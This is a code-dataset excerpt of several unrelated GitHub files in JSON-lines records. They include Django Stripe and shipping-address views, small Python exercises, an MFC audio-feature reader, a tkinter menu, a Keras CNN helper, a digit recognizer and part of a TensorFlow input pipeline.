stripe.PaymentMethod.attach(\n stripe_payment_id.id,\n customer=stripe_customer.stripe_customer_id,\n )\n\n payment_obj = UserPaymentMethodsStripe.objects.filter(user=user)\n\n for pay_obj in payment_obj:\n pay_obj.default = False\n pay_obj.save()\n\n paymentuser_method_stripe = UserPaymentMethodsStripe.objects.create(\n user= user,\n stripe_payment_id= stripe_payment_id.id,\n default= True,\n )\n return Response('payment added')\n\n@api_view(['PUT'])\n@permission_classes([IsAuthenticated])\ndef changeDefaultPaymentMethod(request, pk):\n user = User.objects.get(id=pk)\n data = request.data\n\n payment_methods =UserPaymentMethodsStripe.objects.filter(user=user)\n\n for pay_obj in payment_methods:\n if pay_obj.stripe_payment_id != data['id']:\n pay_obj.default = False\n pay_obj.save()\n else:\n pay_obj.default = True\n pay_obj.save()\n\n return Response(' default payment changed')\n\n\n@api_view(['GET'])\n@permission_classes([IsAuthenticated])\ndef retrievePaymentMethods(request, pk):\n user = User.objects.get(id=pk)\n payment_methods =UserPaymentMethodsStripe.objects.filter(user=user)\n print(payment_methods)\n try:\n stripe.api_key = settings.STRIPE_SECRET_KEY\n user = User.objects.get(id=pk)\n stripe_customer = user.userstripe\n users_payment_methods= stripe.PaymentMethod.list(\n customer=stripe_customer.stripe_customer_id,\n type=\"card\",\n )\n\n json_obj = {}\n json_obj['data']= []\n print(json_obj)\n for method in users_payment_methods.data:\n for pay_method in payment_methods:\n if method.id == pay_method.stripe_payment_id:\n obj= method\n if pay_method.default == True:\n obj['default'] = True\n else:\n obj['default'] = False\n obj['_id'] = pay_method._id\n json_obj['data'].append(obj)\n\n # print(users_payment_methods)\n return Response(json_obj)\n except:\n message = {'detail': 'User does not have payment methods'}\n return Response(message, status= status.HTTP_400_BAD_REQUEST)\n\n\n@api_view(['POST'])\n@permission_classes([IsAuthenticated])\ndef addShippingaddress(request, pk):\n user = User.objects.get(id=pk)\n data = request.data\n\n shippings_adds =ShippingAdress.objects.filter(user= user)\n\n for shipping_add in shippings_adds:\n shipping_add.default = False\n shipping_add.save()\n\n shipping_address =ShippingAdress.objects.create(\n user= user,\n address = data['address'],\n postalCode = data['postalCode'],\n country = data['country'],\n city = data['city'],\n )\n\n return Response('Shippingaddress added')\n\n\n@api_view(['GET'])\n@permission_classes([IsAuthenticated])\ndef retrieveShippingaddress(request, pk):\n user = User.objects.get(id=pk)\n data = request.data\n\n shippings_adds =ShippingAdress.objects.filter(user= user)\n serializer = ShippingAdressSerializer(shippings_adds, many= True)\n\n return Response(serializer.data)\n\n@api_view(['PUT'])\n@permission_classes([IsAuthenticated])\ndef changeDefaultShippingaddress(request, pk):\n user = User.objects.get(id=pk)\n data = request.data\n\n shippings =ShippingAdress.objects.filter(user=user)\n\n for shippings_adds in shippings:\n if int(shippings_adds._id) != int(data['_id']):\n shippings_adds.default = False\n shippings_adds.save()\n else:\n shippings_adds.default = True\n shippings_adds.save()\n\n return Response(' default shippings_adds changed')\n\n@api_view(['DELETE'])\n@permission_classes([IsAuthenticated])\ndef deleteShippingaddress(request, pk):\n user = User.objects.get(id=pk)\n data = request.data\n\n shipping =ShippingAdress.objects.get(_id=data['_id'])\n\n shippings =ShippingAdress.objects.filter(user=user)\n\n if len(shippings) >= 2 and shipping.default == True:\n for shipping_add in shippings:\n if shipping_add._id != shipping._id:\n shipping_add.default = True\n shipping_add.save()\n break;\n\n shipping.delete()\n\n return Response('shipping deleted')\n","repo_name":"oscara1796/ecommerce_platzi_olympia","sub_path":"base/views/user_views.py","file_name":"user_views.py","file_ext":"py","file_size_in_byte":9203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"24209193188","text":"#Brandon Norwood\r\n#09/28/2021\r\n#Assign4-4\r\n\r\nimport sys\r\nimport math\r\n\r\ndef calc(n1, n2, n3):\r\n ex1= n1 \r\n ex2= n2 * n2\r\n ex3= n3 * n3 * n3\r\n \r\n summation = ex1 + ex2 + ex3\r\n result = summation ** (1/2) # math.sqrt(summation)\r\n \r\n result = round(result, 2)\r\n return result\r\n\r\nnum1 = int(sys.argv[1])\r\nnum2 = int(sys.argv[2])\r\nnum3 = int(sys.argv[3])\r\n\r\nresult = calc(num1, num2, num3)\r\nprint(result)\r\n\r\n\r\n","repo_name":"Brandon-Norwood/Python_Scripts","sub_path":"DataProgramming/M4/assign4-4.py","file_name":"assign4-4.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"15413562906","text":"import struct\nimport numpy as np\nimport os\n# input: 特征文件夹的路径\n# return: datas, 各类别的音频特征组成的列表\n# 其中datas['1'] = a list :属于类别1的特征列表, 列表中每个元素都是一个特征序列(T*n_dim的numpy矩阵)\ndef get_mfc_data(path):\n files = os.listdir(path)\n datas = dict()\n for file_name in files: # 读取每个mfc文件到矩阵data中\n data = list()\n with open(path+file_name, 'rb') as f:\n nframes = struct.unpack('>i',f.read(4))[0] # 帧数 \n _ = struct.unpack('>i',f.read(4))[0] # 帧移,100ns为单位,100000指10ms,\n nbytes = struct.unpack('>h',f.read(2))[0] # 每帧特征值的字节长度\n ndim = nbytes / 4 # 每帧的特征的维度(一维为一个int)\n _ = struct.unpack('>h',f.read(2))[0] # [没用] 用户序号\n while True:\n data_byte = f.read(4)\n if len(data_byte) < 4: \n break\n data.append(struct.unpack('>f', data_byte)[0]) \n data = np.array(data)\n data.shape = nframes, int(ndim)\n category = file_name[0]\n if category in datas:\n datas[category].append(data)\n else:\n datas[category] = list()\n datas[category].append(data)\n return datas\n ","repo_name":"guozix/HMM_for_command_recognization","sub_path":"get_mfc_data.py","file_name":"get_mfc_data.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"4203415621","text":"s=\"ABCDEFGHIJKLMNOPQRSTUVWXYZ_.ABCDEFGHIJKLMNOPQRSTUVWXYZ_.\"\n\n# in1=input().split()\n# n=int(in1[0])\n# l=in1[1]\ndef getAns(n, l):\n l=l[::-1]\n new=[s[s.find(x)+n] for x in l]\n print(\"\".join(new))\ncon=True\nwhile con:\n x=input().split()\n if x==[\"0\"]:\n con=False\n elif len(x)==2:\n getAns(int(x[0]), x[1])","repo_name":"Adamkadaban/Competition-Programs","sub_path":"Kattis/reverserot.py","file_name":"reverserot.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"70420348808","text":"# Import packages\nimport tkinter as tk\nimport makeSale\nimport manageProducts\n\n\ndef main():\n\n # Window Geometry and Basic Settings\n windowHeight = 544\n windowWidth = 933\n window = tk.Tk()\n window.title(\"Sistema de Comandas - Chapéu de Sol\")\n window.geometry(str(windowWidth)+\"x\"+str(windowHeight))\n\n # Background Image\n bg = tk.PhotoImage(file=\"img/mainMenuBG.png\")\n label1 = tk.Label(window, image=bg)\n label1.place(x=-2, y=-1)\n\n # Buttons\n bt1 = tk.PhotoImage(file=\"img/buttons/realizarVendasBT.png\")\n button1 = tk.Button(window, image = bt1,command=lambda : navigateNewWindow(window,makeSale))\n #button1.pack(side=tk.LEFT,padx=10)\n button1.place(relx=0.15, rely=0.5, anchor=tk.CENTER)\n\n bt2 = tk.PhotoImage(file=\"img/buttons/gerenciarProdutosBT.png\")\n button2 = tk.Button(window, text = 'Click Me !', image = bt2,command=lambda : navigateNewWindow(window,manageProducts))\n #button2.pack(side=tk.LEFT,padx=10)\n button2.place(relx=0.38, rely=0.5, anchor=tk.CENTER)\n\n bt3 = tk.PhotoImage(file=\"img/buttons/elogiosEReclamacoesBT.png\")\n button3 = tk.Button(window, text = 'Click Me !', image = bt3)\n #button3.pack(side=tk.LEFT,padx=10)\n button3.place(relx=0.61, rely=0.5, anchor=tk.CENTER)\n\n bt4 = tk.PhotoImage(file=\"img/buttons/fecharCaixaBT.png\")\n button4 = tk.Button(window, text = 'Click Me !', image = bt4)\n #button4.pack(side=tk.LEFT,padx=10)\n button4.place(relx=0.84, rely=0.5, anchor=tk.CENTER)\n\n window.mainloop()\n\ndef navigateNewWindow(currentWindow,newWindowFile):\n newWindowFile.open(currentWindow)\n\nmain()\n","repo_name":"GabrielTomonari/sistema-comandas","sub_path":"mainMenu.py","file_name":"mainMenu.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"72449587848","text":"import pytest\nimport sys\nsys.path.extend([\".\", \"..\", \"../..\", \"../../..\"])\nfrom model.environment_frozenlake import FrozenLake\nfrom model.agent_reinforce import AgentREINFORCE\nfrom controller.controller_reinforce import ControllerREINFORCE\nfrom view.animation_frozenlake import AnimationFrozenLake\nfrom view.gui import GUI\nfrom tkinter import Tk\n\n\n@pytest.fixture(scope=\"module\")\ndef controller():\n pytest.env = FrozenLake(False)\n pytest.agent = AgentREINFORCE(pytest.env)\n root = Tk()\n animation = AnimationFrozenLake(root, pytest.env.GRID_MAP, update_animation=False)\n pytest.gui = GUI(root, animation)\n pytest.controller = ControllerREINFORCE(pytest.env, pytest.agent, pytest.gui)\n return pytest.controller\n\n\ndef test_stop_and_reset(controller):\n pytest.gui.animation.update_animation = False\n pytest.controller.stop_and_reset()\n env_current_state = pytest.env.current_state\n num_of_weights = len(pytest.agent.theta)\n assert (env_current_state, num_of_weights) == ((0, 0), 2)\n\n\ndef test_episode(controller):\n pytest.gui.animation.update_animation = False\n pytest.controller.run_episode()\n","repo_name":"avcordaro/animated-reinforcement-learning","sub_path":"tests/integration/controllers/test_controller_reinforce_with_agent_&_env.py","file_name":"test_controller_reinforce_with_agent_&_env.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"26687788596","text":"# src ultis to create CNN layer based on user define parameters and input data size.\n\n# import API/libraries. \nimport numpy as np\nimport pandas as pd \nimport tensorflow as tf\nimport logging\nimport sys\n\n\n# system setup\nsys.path.append('/Users/ahum/Documents/[Project] PIPE_DEV/src')\nsys.path.append('/Users/ahum/Documents/[Project] PIPE_DEV/data/')\nlogging.basicConfig(filename='/Users/ahum/Documents/[Project] PIPE_DEV/src/scr_ultis.log', \n encoding='utf-8',filemode='a',\n format='<%(asctime)s> ---- %(message)s', level=logging.INFO)\n# print version\nlogging.info('---- API/Package Versions -----')\nlogging.info('| numpy | Version:{}'.format(np.__version__))\nlogging.info('| pandas | Version:{}'.format(pd.__version__))\nlogging.info('| tensorflow | Version:{}'.format(tf.__version__))\nlogging.info('| logging | Version:{}'.format(logging.__version__))\nlogging.info('-------------------------------')\n\n# side note: start define the class\n# 1) Data preparing class - Need to create another ultis file and import into here.\n# 2) DL define class\n\nclass _CNN_Ultis():\n def __init__(self,in_ary='',pad_mode=False,pad_sz=[1,1],filter_sz=[3,3],stride=1):\n '''\n Initialisation for creating CNN baseline NN.\\n\n\n Input:\\n\n ------\\n\n in_ary: (dtype: array): input array that store the input data. Default is empty\\n\n pad_mode: (dtype: boolean): input array that store the input data. Default is false, which indicate no padding.\\n\n pad_sz: (dtype: array): input array indicates the padding size to be added to the input data. Default is [1,1] meaning an addition 1 row and 1 column of pixel is added to the data. pad_sz is ignored if pad_mode is False\\n\n filter_sz (dtype: array): input array is the filter size. Default size is [3,3], i.e., 3x3. \n stride (dtype: integer): the integer indicates the sliding step of the filter across the input data. Default is 1. Do not that the stride must not be more that the filter size\\n \n '''\n try:\n self.in_data=in_ary\n self.pad_mode=pad_mode\n self.padSZ=pad_sz\n self.filterSZ=filter_sz\n self.stride=stride\n logging.info('Ultis initialised.')\n logging.info('------------------')\n if pad_mode==False:\n logging.info('|Padding: {}|filter_sz: {}|stride: {}|'.format(str(pad_mode),str(filter_sz),str(stride)))\n else:\n logging.info('|Padding_sze: {}|filter_sz: {}|stride: {}|'.format(str(pad_sz),str(filter_sz),str(stride))) \n \n except Exception as e:\n logging.error(\"Exception occurred\", exc_info=True)\n \n def _Cal_NN_SZ(self):\n # get the size of the image\n sh=self.in_data.shape\n self.im_W=sh[1]\n self.im_ht=sh[2]\n self.im_ch=sh[3]\n\n def _define_NN(self):\n #in_sh=(4,28,28,3)\n #x=tf.random.normal(in_sh)\n #in_shape=[512,512]\n logging.info('-------Defining the CNN structure-----.')\n opti_filterSZ=self.in_data.shape[1]*self.in_data.shape[2]*self.in_data.shape[3]\n #init=tf.keras.initializers.GlorotNormal(seed=None) # initialise the weight with uniform distibution\n \n layer_in=tf.keras.layers.Input(shape=[self.in_data.shape[1],self.in_data.shape[1],self.in_data.shape[-1]],name='CNN_in')\n layer_l1=tf.keras.layers.Conv2D(filters=opti_filterSZ,kernel_size=(self.filterSZ[0],self.filterSZ[1]),padding='same',\n activation='relu',strides=self.stride,name='CNN_L1',input_shape=self.in_data.shape[1:])(layer_in)\n layer_l1_maxpool=tf.keras.layers.MaxPooling2D(pool_size=(2,2))(layer_l1) #maxpooling with pool_size of 2,2 will reduce the conv size by half. \n \n layer_l2=tf.keras.layers.Conv2D(filters=opti_filterSZ,kernel_size=(self.filterSZ[0],self.filterSZ[1]),padding='same',\n activation='relu',strides=self.stride,name='CNN_L2',input_shape=self.in_data.shape[1:])(layer_l1_maxpool)\n layer_l2_maxpool=tf.keras.layers.MaxPooling2D(pool_size=(2,2))(layer_l2) #maxpooling with pool_size of 2,2 will reduce the conv size by half.\n\n featureMAP=tf.keras.layers.Conv2D(filters=opti_filterSZ,kernel_size=(self.filterSZ[0],self.filterSZ[1]),padding='same',\n activation='relu',strides=self.stride,name='featureMAP',input_shape=self.in_data.shape[1:])(layer_l2_maxpool)\n layer_Fm_maxpool=tf.keras.layers.MaxPooling2D(pool_size=(2,2))(featureMAP) #maxpooling with pool_size of 2,2 will reduce the conv size by half. \n\n layer_Flat=tf.keras.layers.Flatten()(layer_Fm_maxpool)\n layer_D1=tf.keras.layers.Dense(2,activation='sigmoid')(layer_Flat)\n output=tf.keras.layers.Dropout(0.5)(layer_D1)\n # Can include a dropout layer here\n\n # fit NN to the model\n self.CNN_model=tf.keras.Model(layer_in,output,name='CNN_out')\n self.CNN_model.summary(print_fn=logging.info)\n #logging.info(self.CNN_model.summary())\n pass\n\nif __name__=='__main__':\n # for testing purpose\n from tensorflow.keras import datasets\n (train_images, train_labels), (test_images, test_labels) = datasets.cifar10.load_data()\n a=_CNN_Ultis(in_ary=train_images)\n a._Cal_NN_SZ()\n a._define_NN()\n pass\n\n\n","repo_name":"allenhjw/castor","sub_path":"src/DL_CNN_ulits.py","file_name":"DL_CNN_ulits.py","file_ext":"py","file_size_in_byte":5354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"29418752012","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Feb 6 18:08:32 2021\n\n@author: Usuario\n\"\"\"\n\nwhile True:\n x=input (\"Ingrese el nummero que contaré: \")\n if x== 'q' or x == 'quit':\n break\n x=int (x)\n y=1\n while True:\n print (y)\n y=y+1\n if y>x:\n break","repo_name":"andreso21/ProgramasAndresQuishpe","sub_path":"Ejercicio6_While_Anidado.py","file_name":"Ejercicio6_While_Anidado.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"16303385225","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n# Construct the file path\nfile_path = \"C://Users/Evan Anderson/Desktop/Hospital_General_Information.csv\"\ndata = pd.read_csv(file_path)\n\n# Sort the data by 'Hospital_Ownership' column\nsorted_data = data.sort_values(by='Hospital_Ownership')\n\n# Calculate average rating per hospital ownership type\ndata['Hospital_overall_rating'] = pd.to_numeric(data['Hospital_overall_rating'], errors='coerce')\navg_rating = data.groupby('Hospital_Ownership')['Hospital_overall_rating'].mean().sort_values()\n\n# Plotting the bar chart with average ratings\nplt.figure(figsize=(10, 6))\n\nfor index, (ownership, rating) in enumerate(avg_rating.items()):\n plt.bar(ownership, rating)\n plt.text(index, rating + 0.05, f'{rating:.2f}', ha='center', va='bottom', fontsize=8)\n\n# Set labels and title\nplt.title('Average Rating per Hospital Ownership Type')\nplt.xlabel('Ownership Type')\nplt.ylabel('Average Rating')\n\nplt.xticks(rotation=45, ha='right')\nplt.tight_layout()\nplt.show()\n","repo_name":"evan1417/IUSM_EM","sub_path":"boeing_hospital/hosp_ownership_rating.py","file_name":"hosp_ownership_rating.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"37637950073","text":"from typing import List\n\nfrom app.config.settings import settings\n\nMODELS_MODULES: List[str] = [\"app.db.models\"] # noqa: WPS407\n\nTORTOISE_CONFIG = {\n \"connections\": {\n \"default\": settings.get_asyncpg_conn_string,\n },\n \"apps\": {\n \"models\": {\n \"models\": MODELS_MODULES,\n \"default_connection\": \"default\",\n },\n },\n}\n","repo_name":"aryantps/auth","sub_path":"app/db/tortoise_config.py","file_name":"tortoise_config.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"33921621022","text":"from bs4 import BeautifulSoup\nimport requests\nimport twint\nimport nest_asyncio\nnest_asyncio.apply()\nimport pandas as pd\n\n\n\ndef format_country_name(country:str):\n '''\n feed with a country name and return formated country name \n eg. United State -> united-state\n '''\n return country.replace(\" \",\"-\").lower()\n\n\ndef get_countries():\n '''\n using beautifull soup and scrap https://trendstwitter.com/ and look for available countries in trends list\n '''\n url = 'https://trendstwitter.com/'\n\n html_text= requests.get(url=url).content\n soup=BeautifulSoup(html_text,\"html.parser\")\n countries_h5=soup.find_all('h5',class_='location-menu__country-header')\n countries_list=[]\n for country in countries_h5:\n countries_list.append(country.text)\n countries_list[0]='Worldwide'\n return countries_list\n\n\n\n\ndef get_trends(country:str):\n '''\n feed with country name and return this countrie trending topics\n '''\n if country.lower()=='worldwide':\n country=''\n country=format_country_name(country)\n url = 'https://trendstwitter.com/'+country\n\n html_text= requests.get(url=url).content\n soup=BeautifulSoup(html_text,\"html.parser\")\n tends_li=soup.find('ol',class_='trend-card__list').find_all('li')\n df=pd.DataFrame(columns=[\"trends\",\"links\",\"volumes\"])\n for li in tends_li:\n tends_data={}\n volume=li.find('div',class_=\"oltweets\")\n if volume is None:\n tends_data[\"volumes\"]=0\n else:\n tends_data[\"volumes\"]=int(volume.text.split()[0])\n tends_data[\"links\"]=li.find('a')['href']\n tends_data[\"trends\"]=li.find('a').text\n df=pd.concat([df,pd.DataFrame(tends_data,index={1})],ignore_index=True)\n\n return df.sort_values(by=['volumes'], ascending=False)\n\n\n\n\ndef fetch_tweets(hachtag:str):\n '''\n feed with a topic string and retrun 200 last tweet data about this topic\n '''\n config = twint.Config()\n columns=['conversation_id', 'date', 'language', 'username', 'tweet','nretweets', 'nlikes', 'hashtags']\n config.Limit=200\n config.Hide_output = True\n config.Search = hachtag\n config.Pandas=True\n twint.run.Search(config)\n df=twint.storage.panda.Tweets_df[columns]\n return df\n\n\ndef find_common_trends(trends_1:list,trends_2:list):\n '''\n feed with two list of topics and return common elements in these list\n '''\n common= [trend for trend in trends_1 if trend in trends_2]\n return common","repo_name":"isaac-bix/Twitter-Data-Visualisation-and-Graph-Analytics","sub_path":"models/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":2470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"36258590888","text":"from PIL import Image\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport time\r\nfrom statistics import mean\r\nfrom functools import reduce\r\nfrom collections import Counter #counts number of items in list and prints dictionary\r\nimport pyttsx3\r\nengine = pyttsx3.init()\r\ndef say(text):\r\n engine.say(\"The number is \" + str(text))\r\n engine.runAndWait()\r\ndef createExamples():\r\n\tnumberArrayExamples = open('numArEx.txt','a')\r\n\tnumbersWeHave = range(0,10)\r\n\tversionsWeHave = range(1,10)\r\n\r\n\tfor eachnumbers in numbersWeHave:\r\n\t\tfor eachversion in versionsWeHave:\r\n\t\t\t#print (str(eachnumbers)+'.'+str(eachversion))\r\n\t\t\timagefilepath='images/numbers/' + (str(eachnumbers)+'.'+str(eachversion))+'.png'\r\n\t\t\texampleimage = Image.open(imagefilepath)\r\n\t\t\texampleimagearray=np.array(exampleimage)\r\n\t\t\texampleimagearray1=str(exampleimagearray.tolist())\r\n\t\t\tlinetowrite = str(eachnumbers)+'::'+exampleimagearray1+'\\n'\r\n\t\t\tnumberArrayExamples.write(linetowrite)\r\n\r\n#createExamples() #function call to train the program for values\r\n#defining a function that turns the image to a black and white image( grayscale )\r\ndef threshold(imagearray):\r\n\tbalancearray=[] #declaring a balance array\r\n\tnewarray = imagearray\r\n\tfor eachrow in imagearray:\r\n\t\tfor eachpixel in eachrow:\r\n\t\t\taveragepixel = mean(eachpixel) #reduce(lambda x,y:x+y,eachpixel[:3])/len(eachpixel[:3])\r\n\t\t\tbalancearray.append(averagepixel)\r\n\tbalance = mean(balancearray) #reduce(lambda x,y:x+y,balancearray/len(balancearray))\r\n\tfor eachrow in newarray:\r\n\t\tfor eachpixel in eachrow:\r\n\t\t\tif mean(eachpixel) > balance:\r\n\t\t\t\teachpixel[0]=255\r\n\t\t\t\teachpixel[1]=255\r\n\t\t\t\teachpixel[2]=255\r\n\t\t\t\teachpixel[3]=255\r\n\t\t\telse:\r\n\t\t\t\teachpixel[0]=0\r\n\t\t\t\teachpixel[1]=0\r\n\t\t\t\teachpixel[2]=0\r\n\t\t\t\teachpixel[3]=255\r\n\treturn newarray\r\ndef whatNumberisthis(filepath):\r\n\tmatchedArray=[]\r\n\tloadExamples = open('numArEx.txt','r').read()\r\n\tloadExamples = loadExamples.split('\\n')\r\n\timage = Image.open(filepath)\r\n\timagearray = np.array(image)\r\n\timagearray1 = imagearray.tolist()\r\n\r\n\tinQuestion = str(imagearray1)\r\n\r\n\tfor eachExamples in loadExamples:\r\n\t\tif(len(eachExamples)>3):\r\n\t\t\tsplitExamples = eachExamples.split(\"::\")\r\n\t\t\tcurrentElement = splitExamples[0]\r\n\t\t\tcurrentArray = splitExamples[1]\r\n\r\n\t\t\teachpixelExample = currentArray.split('],')\r\n\r\n\t\t\teachpixelinQuestion = inQuestion.split('],')\r\n\r\n\t\t\telement = 0\r\n\t\t\twhile(element 4600):\r\n\t\tgraphY.append(element[eachelement])\t\r\n\tsay (ele)\r\n\tsay (ele)\r\n\r\n\tfigure = plt.figure()\r\n\taxis1=plt.subplot2grid((4,4),(0,0),rowspan=1,colspan=4)\r\n\taxis2=plt.subplot2grid((4,4),(1,0),rowspan=1,colspan=4)\r\n\r\n\taxis1.imshow(imagearray)\r\n\taxis2.bar(graphX,graphY,align='center')\r\n\r\n\txlocation = plt.MaxNLocator(12)\r\n\taxis2.xaxis.set_major_locator(xlocation)\r\n\r\n\r\n\tplt.ylim(400) #limit y axis\r\n\tplt.show()\r\n\r\n\r\n\r\nwhatNumberisthis('images/test.png')\r\n\r\n\r\n'''\r\n#opening images as array\r\nimage1 = Image.open('images/numbers/0.1.png')\r\nimagearray1 = np.array(image1)\r\n\r\nimage2 = Image.open('images/numbers/y0.4.png')\r\nimagearray2 = np.array(image2)\r\n\r\nimage3 = Image.open('images/numbers/y0.5.png')\r\nimagearray3 = np.array(image3)\r\n\r\nimage4 = Image.open('images/sentdex.png')\r\nimagearray4 = np.array(image4)\r\n\r\n\r\nthreshold(imagearray2)\r\nthreshold(imagearray3)\r\nthreshold(imagearray4)\r\n\r\n#plotting images in a graph with rows8 and column 6\r\n\r\nfigure=plt.figure()\r\naxis1 = plt.subplot2grid((8,6),(0,0),rowspan=4,colspan=3)\r\naxis2 = plt.subplot2grid((8,6),(4,0),rowspan=4,colspan=3)\r\naxis3 = plt.subplot2grid((8,6),(0,3),rowspan=4,colspan=3)\r\naxis4 = plt.subplot2grid((8,6),(4,3),rowspan=4,colspan=3)\r\n\r\n#showing images in axis\r\n\r\naxis1.imshow(imagearray1)\r\naxis2.imshow(imagearray2)\r\naxis3.imshow(imagearray3)\r\naxis4.imshow(imagearray4)\r\n\r\n#displaying/printing axis\r\n\r\nplt.show()\r\n'''\r\n","repo_name":"bsreeram08/Number-Recogonizer","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":4331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"14307720052","text":"def gcd(a,b):\n if b ==0:\n return a\n return gcd(b, a% b)\n\ndef solve(A,B,C):\n\n lcm = B*C / gcd(B,C)\n\n val = lcm\n count = 0\n i = 2\n while val <= A:\n val = i * lcm\n i += 1\n count += 1\n return count\n\nA = 12\nB = 2\nC = 3\nprint(solve(A,B,C))","repo_name":"SauravSinha76/scaler2","sub_path":"class34/diviser_game.py","file_name":"diviser_game.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"1498585553","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n#\n# Complete the 'getWays' function below.\n#\n# The function is expected to return a LONG_INTEGER.\n# The function accepts following parameters:\n# 1. INTEGER n\n# 2. LONG_INTEGER_ARRAY c\n#\n\n\ndef getWays(n, c):\n # Write your code here\n dp = [0 for _ in range(n + 1)]\n dp[0] = 1\n m = len(c)\n c.sort()\n for j in range(m):\n for i in range(1, n + 1):\n if i >= c[j]:\n dp[i] += dp[i - c[j]]\n return dp[n]\n\n\narr = []\nn = len(arr)\ni, j = 0, 0\ncntV, plusOne, minusOne = 0, 0, 0\nres = 0\nwhile j < n:\n if arr[j] == arr[i]:\n cntV += 1\n j += 1\n continue\n if arr[j] == arr[i] + 1:\n if minusOne == 0:\n plusOne += 1\n j += 1\n continue\n res = max(res, minusOne + cntV)\n pre = arr[i]\n while i < j:\n if pre == arr[i]:\n cntV -= 1\n else:\n minusOne -= 1\n if minusOne == 0:\n break\n i += 1\n continue\n if arr[j] == arr[i] - 1:\n if plusOne == 0:\n minusOne += 1\n j += 1\n continue\n res = max(res, plusOne + cntV)\n pre = arr[i]\n while i < j:\n if pre == arr[i]:\n cntV -= 1\n else:\n plusOne -= 1\n if plusOne == 0:\n break\n i += 1\n continue\n if plusOne != 0:\n res = max(res, plusOne + cntV)\n else:\n res = max(res, minusOne + cntV)\n i = j\n\n\nprint(getWays(3, [8, 3, 1, 2]))\n\n# if __name__ == '__main__':\n# fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n# first_multiple_input = input().rstrip().split()\n\n# n = int(first_multiple_input[0])\n\n# m = int(first_multiple_input[1])\n\n# c = list(map(int, input().rstrip().split()))\n\n# # Print the number of ways of making change for 'n' units using coins having the values given by 'c'\n\n# ways = getWays(n, c)\n\n# fptr.write(str(ways) + '\\n')\n\n# fptr.close()\n","repo_name":"weiliping/codingbasics","sub_path":"src/main/py/interviewbit/Dynamic_Programming/getWays.py","file_name":"getWays.py","file_ext":"py","file_size_in_byte":2105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"73147939528","text":"\"\"\"Create the input data pipeline using `tf.data`\"\"\"\n\nimport tensorflow as tf\nimport os\n\n#import model.mnist_dataset as mnist_dataset\n\n\n# def train_input_fn(data_dir, params):\n# \"\"\"Train input function for the MNIST dataset.\n\n# Args:\n# data_dir: (string) path to the data directory\n# params: (Params) contains hyperparameters of the model (ex: `params.num_epochs`)\n# \"\"\"\n# dataset = mnist_dataset.train(data_dir)\n# dataset = dataset.shuffle(params.train_size) # whole dataset into the buffer\n# dataset = dataset.repeat(params.num_epochs) # repeat for multiple epochs\n# dataset = dataset.batch(params.batch_size)\n# dataset = dataset.prefetch(1) # make sure you always have one batch ready to serve\n# return dataset\n\n\n# def test_input_fn(data_dir, params):\n# \"\"\"Test input function for the MNIST dataset.\n\n# Args:\n# data_dir: (string) path to the data directory\n# params: (Params) contains hyperparameters of the model (ex: `params.num_epochs`)\n# \"\"\"\n# dataset = mnist_dataset.test(data_dir)\n# dataset = dataset.batch(params.batch_size)\n# dataset = dataset.prefetch(1) # make sure you always have one batch ready to serve\n# return dataset\n\ndef _parse_function(filename, label, size):\n \"\"\"Obtain the image from the filename (for both training and validation).\n\n The following operations are applied:\n - Decode the image from jpeg format\n - Convert to float and to range [0, 1]\n \"\"\"\n image_string = tf.read_file(filename)\n\n # Don't use tf.image.decode_image, or the output shape will be undefined\n image_decoded = tf.image.decode_jpeg(image_string, channels=3)\n\n # This will convert to float values in [0, 1]\n image = tf.image.convert_image_dtype(image_decoded, tf.float32)\n\n resized_image = tf.image.resize_images(image, [size, size])\n\n return resized_image, label\n\ndef train_preprocess(image, label, use_random_flip):\n \"\"\"Image preprocessing for training.\n\n Apply the following operations:\n - Horizontally flip the image with probability 1/2\n - Apply random brightness and saturation\n \"\"\"\n if use_random_flip:\n image = tf.image.random_flip_left_right(image)\n\n image = tf.image.random_brightness(image, max_delta=32.0 / 255.0)\n image = tf.image.random_saturation(image, lower=0.5, upper=1.5)\n\n # Make sure the image is still in [0, 1]\n image = tf.clip_by_value(image, 0.0, 1.0)\n\n return image, label\n\ndef grayscale(image, label):\n image = tf.image.rgb_to_grayscale(image)\n return image, label\n\ndef input_fn(is_training, filenames, labels, params):\n \"\"\"Input function for the SIGNS dataset.\n\n The filenames have format \"{label}_IMG_{id}.jpg\".\n For instance: \"data_dir/2_IMG_4584.jpg\".\n\n Args:\n 